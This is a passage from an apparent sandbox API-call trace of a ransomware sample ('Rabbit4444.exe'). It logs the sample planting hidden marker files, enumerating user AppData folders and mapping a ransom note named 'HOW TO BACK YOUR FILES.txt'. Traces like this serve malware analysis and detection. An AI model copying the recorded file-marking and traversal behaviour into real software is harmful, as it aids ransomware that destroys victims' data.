returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory\\" [0063.620] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0063.620] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.621] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.624] FlushFileBuffers (hFile=0x298) returned 1 [0063.625] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.625] CloseHandle (hObject=0x298) returned 1 [0063.625] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory") returned 96 [0063.625] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.625] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbedee638, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedee638, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef3f1251, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.626] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.626] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.626] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.626] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.626] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbedee638, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbedee638, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef3f1251, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.626] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.626] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.626] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.626] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.626] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.626] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3f1251, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3f1251, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3f1251, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.626] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.626] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.626] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3f1251, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3f1251, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef3f1251, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.626] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.626] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.626] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.626] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.627] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.627] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.627] CloseHandle (hObject=0x278) returned 1 [0063.627] CloseHandle (hObject=0x298) returned 1 [0063.627] GetCurrentThreadId () returned 0xd98 [0063.627] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0063.627] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies" [0063.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116450 | out: hHeap=0xe0000) returned 1 [0063.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0063.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies" [0063.627] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies\\" [0063.627] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0063.627] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.628] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.633] FlushFileBuffers (hFile=0x298) returned 1 [0063.633] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.634] CloseHandle (hObject=0x298) returned 1 [0063.635] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies") returned 96 [0063.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.635] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbedee638, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a5030e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef3f1251, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0063.635] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.635] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.635] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.635] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.635] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbedee638, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a5030e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef3f1251, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.635] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.635] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.635] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.635] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.636] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.636] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3f1251, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3f1251, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef417781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.636] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.636] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.636] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef3f1251, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef3f1251, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef417781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.636] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0063.636] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.636] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.637] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.637] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.637] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.637] CloseHandle (hObject=0x278) returned 1 [0063.637] CloseHandle (hObject=0x298) returned 1 [0063.637] GetCurrentThreadId () returned 0xd98 [0063.637] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0063.637] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache" [0063.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0063.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0063.638] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache" [0063.638] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache\\" [0063.638] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0063.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.639] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.641] FlushFileBuffers (hFile=0x298) returned 1 [0063.642] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.642] CloseHandle (hObject=0x298) returned 1 [0063.643] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache") returned 94 [0063.643] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.643] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbedebf51, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a4fb8a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef417781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0063.643] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.643] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.643] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.643] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.643] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbedebf51, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd1a4fb8a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef417781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.643] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.643] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.643] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.643] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.643] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.643] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef417781, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef417781, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef417781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.643] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.643] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.643] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef417781, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef417781, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef417781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.643] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0063.644] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.644] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsfeedbackhub_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.644] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.644] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.644] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.645] CloseHandle (hObject=0x278) returned 1 [0063.645] CloseHandle (hObject=0x298) returned 1 [0063.645] GetCurrentThreadId () returned 0xd98 [0063.645] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122188 [0063.645] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe" [0063.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e200 | out: hHeap=0xe0000) returned 1 [0063.645] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122180 | out: hHeap=0xe0000) returned 1 [0063.645] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe" [0063.645] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\" [0063.645] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0063.645] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.646] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.648] FlushFileBuffers (hFile=0x298) returned 1 [0063.649] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.649] CloseHandle (hObject=0x298) returned 1 [0063.650] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe") returned 88 [0063.650] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.650] FindFirstFileW (in: 